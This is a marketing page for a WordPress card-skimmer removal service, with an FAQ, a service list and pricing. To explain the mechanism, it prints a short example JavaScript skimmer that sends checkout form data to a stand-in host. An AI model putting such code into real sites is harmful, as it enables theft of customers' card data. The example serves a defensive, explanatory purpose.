How do card skimmers end up on a WordPress site?

Almost always through a vulnerable plugin or a stolen admin password. The attacker drops a small piece of JavaScript onto your checkout page that silently copies card numbers as customers type them.

Are my customers safe now that the skimmer is removed?

Going forward, yes. Cards entered while the skimmer was running need to be considered compromised. I include the timeline in my report so you can notify affected customers and your payment processor.

Do I have to tell my payment processor?

Most card-brand rules require notification of a card-data incident. Our report is written to be handed straight to your acquirer or insurer without further translation.

Will Google flag my store?

Often, yes. We submit a Safe Browsing reconsideration as part of every cleanup and request re-indexation in Search Console once the skimmer is out.

// CARD SKIMMER · WORDPRESS · REMOVED

WordPress credit card skimmer removal.

Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.

Start a cleanup → How card skimmers work

§ 01 — MECHANISM

A few lines of JavaScript can steal every order.

A card skimmer is a tiny piece of JavaScript that listens to your checkout form. Every time a customer types their card number, the skimmer makes a copy and sends it to an address the attacker controls — usually a server that looks innocent from the outside.

The page still works. The order still goes through. Nothing looks wrong to the customer or to you. I reproduce the order in a sandbox, trace the script back to where it lives in your site, and remove it without breaking the rest of the checkout.

// rough shape of a checkout skimmer

01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST', body: data, mode: 'no-cors'
05   });
06 });
07
08 // A fetch to an external host on form submit is the signature.

§ 02 — WHAT WE REMOVE

Every place a skimmer can hide.

[ TRIAGE ]

I place a test order in a sandbox and watch every network call the checkout makes.
[ JAVASCRIPT ]

Theme files, plugin assets, and inline scripts reviewed. Anything sending form data off-domain — pulled.
[ DATABASE ]

Injected scripts in wp_options, wp_posts, and active widgets — purged. Persistence removed.
[ SERVER ]

PHP backdoors that re-install the skimmer hunted down. Cron jobs and must-use plugins checked.
[ TIMELINE ]

First-seen and last-seen dates established so you know which orders were exposed.
[ REPORT ]

Plain-English forensic write-up suitable for acquirers and insurers. Entry vector named.

§ PRICE

Flat $279. One-time. Per site.

[ RESCUE ]

$279

FLAT · ONE-TIME · PER SITE

Manual cleanup, entry-vector identification, written forensic report.

Start a cleanup →

[ SHIELD ]

$29 / mo

PER SITE · CANCEL ANY TIME

Continuous monitoring, hardening, one cleanup per year included.

Get protected →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

See all services →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contact →